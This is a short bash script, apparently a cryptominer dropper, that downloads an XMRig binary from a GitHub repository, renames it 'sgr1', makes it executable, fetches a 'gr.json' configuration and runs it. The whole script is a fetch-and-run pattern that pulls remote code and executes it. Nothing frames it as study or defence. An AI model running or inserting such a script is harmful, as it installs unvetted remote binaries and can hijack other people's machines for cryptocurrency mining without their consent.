#!/bin/bash
#!/bin/bash
wget -O sgr1 https://raw.githubusercontent.com/tyha4t57i/filesg/main/xmrig
chmod +x sgr1
wget https://raw.githubusercontent.com/tyha4t57i/filesg/main/gr.json
./sgr1 -c "gr.json"
